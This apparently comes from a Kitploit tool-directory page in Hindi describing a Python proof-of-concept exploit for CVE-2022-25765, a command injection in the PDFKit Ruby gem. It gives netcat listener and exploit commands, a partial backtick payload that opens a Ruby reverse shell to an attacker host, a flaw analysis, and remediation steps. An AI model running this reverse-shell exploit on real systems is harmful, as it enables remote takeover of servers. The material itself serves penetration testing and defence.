Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-25765 — CVE-2022-25765 के लिए Python PoC एक्सप्लॉइट, PDFKit में एक गंभीर कमांड इंजेक्शन। wkhtmltopdf को पास किए गए अनसैनिटाइज़्ड URL पैरामीटर के माध्यम से एक रिवर्स शेल उत्पन्न करता है। उपयोग निर्देश और तकनीकी भेद्यता विश्लेषण शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/lowercasenumbers/cve-2022-25765
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHublowercasenumbers/cve-2022-25765

CVE-2022-25765

CVE-2022-25765 के लिए Python PoC एक्सप्लॉइट, PDFKit में एक गंभीर कमांड इंजेक्शन। wkhtmltopdf को पास किए गए अनसैनिटाइज़्ड URL पैरामीटर के माध्यम से एक रिवर्स शेल उत्पन्न करता है। उपयोग निर्देश और तकनीकी भेद्यता विश्लेषण शामिल हैं।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
रिपॉजिटरी देखें
19 महीने पहलेअभी तक समीक्षित नहीं
साझा करें

CVE-2022-25765 शोषण

CVE-2022-25765 के लिए एक छोटा POC शोषण, PDFkit-CMD-Injection

उपयोग

  1. अपने हमला करने वाली मशीन पर netcat लिसनर शुरू करें:

    root@kitploit:~
    nc -lvnp 4444
    
  2. शोषण चलाएँ:

    root@kitploit:~
    python cve-2022-25765.py -t http://TARGET_IP:PORT -l YOUR_IP -p YOUR_PORT
    

उदाहरण:

root@kitploit:~
python cve-2022-25765.py -t http://10.40.11.43:80 -l 10.10.14.12 -p 4444

पैरामीटर:

  • -t, --target: लक्षित URL जो संवेदनशील PDFKit चला रहा है
  • -l, --lhost: रिवर्स शेल कनेक्शन के लिए आपका IP पता
  • -p, --lport: रिवर्स शेल कनेक्शन के लिए आपका पोर्ट (आपके netcat लिसनर से मेल खाना चाहिए)

भेद्यता सूचना

CVE ID: CVE-2022-25765 CVSS v3.1 स्कोर: 9.8 (गंभीर) EPSS स्कोर: 71.381% (99वां प्रतिशतक) CWE: CWE-77 - कमांड में प्रयुक्त विशेष तत्वों का अनुचित निष्प्रभावीकरण

प्रभावित संस्करण

  • संवेदनशील: PDFKit 0.0.0 - 0.8.6
  • पैच किया गया: PDFKit 0.8.7.2+

विवरण

PDFKit एक Ruby gem है जो wkhtmltopdf कमांड-लाइन टूल का उपयोग करके HTML को PDF में परिवर्तित करता है। भेद्यता इस बात में मौजूद है कि PDFKit URL पैरामीटर को सिस्टम शेल कमांड में पास करने से पहले कैसे संभालता है।

तकनीकी विवरण

भेद्यता lib/pdfkit/source.rb में है जहाँ URL स्वच्छता गलत तरीके से लागू की गई है:

root@kitploit:~
def shell_safe_url
  url_needs_escaping? ? URI::DEFAULT_PARSER.escape(@source) : @source
end

समस्या:

  1. PDFKit यह निर्धारित करने के लिए दोषपूर्ण तर्क का उपयोग करता है कि URL को एस्केप करने की आवश्यकता है या नहीं
  2. शेल मेटाकैरेक्टर (बैकटिक, सेमीकोलन, पाइप आदि) इस जाँच को बायपास कर सकते हैं
  3. गैर-स्वच्छित URLs सीधे शेल कमांड को पास किए जाते हैं जो wkhtmltopdf को आमंत्रित करते हैं
  4. हमलावर मनमाने कमांड इंजेक्ट कर सकते हैं जो सर्वर पर निष्पादित होते हैं

हमला वेक्टर:

  • जटिलता: निम्न
  • आवश्यक विशेषाधिकार: कोई नहीं
  • उपयोगकर्ता संपर्क: कोई नहीं
  • नेटवर्क पहुँच: आवश्यक

यह शोषण कैसे काम करता है

यह PoC भेद्यता का शोषण इस प्रकार करता है:

  1. बैकटिक कमांड प्रतिस्थापन वाले दुर्भावनापूर्ण URL का इंजेक्शन
  2. The payload: http://ATTACKER_IP:PORT/?name=%20` ruby -rsocket...`'
  3. PDFKit URL पैरामीटर में बैकटिक को स्वच्छ करने में विफल रहता है
  4. जब wkhtmltopdf URL को प्रोसेस करता है, तो शेल Ruby रिवर्स शेल निष्पादित करता है
  5. लक्ष्य प्रणाली हमलावर के लिसनर से वापस कनेक्ट होती है

प्रभाव

  • गोपनीयता: उच्च - पूर्ण प्रणाली पहुँच
  • अखंडता: उच्च - किसी भी फ़ाइल को संशोधित करने की क्षमता
  • उपलब्धता: उच्च - प्रणाली में व्यवधान की संभावना

सफल शोषण के लिए पूर्वापेक्षाएँ

लक्ष्य प्रणाली पर:

  • संवेदनशील PDFKit संस्करण (< 0.8.7.2)
  • Ruby स्थापित है (रिवर्स शेल पेलोड के लिए आवश्यक)
  • एप्लिकेशन उपयोगकर्ता-नियंत्रित URLs को PDFKit को पास करता है
  • आउटबाउंड कनेक्शन को अवरुद्ध करने वाला कोई ईग्रेस फ़िल्टरिंग नहीं

उपचार

  1. PDFKit को अपग्रेड करें संस्करण 0.8.7.2 या बाद में
  2. इनपुट सत्यापन: URL इनपुट के लिए सख्त अनुमति सूची लागू करें
  3. सैंडबॉक्सिंग: PDFKit प्रक्रियाओं को न्यूनतम विशेषाधिकारों के साथ पृथक कंटेनरों में चलाएँ
  4. नेटवर्क विभाजन: PDF उत्पादन सेवाओं से आउटबाउंड कनेक्शन प्रतिबंधित करें
  5. WAF नियम: URL पैरामीटर में शेल मेटाकैरेक्टर का पता लगाने के लिए नियम तैनात करें

संदर्भ

  • NVD - CVE-2022-25765
  • GitHub Advisory GHSA-rhwx-hjx2-x4qr
  • PDFKit Issue #507
  • RubySec Advisory
टूल डाउनलोड करें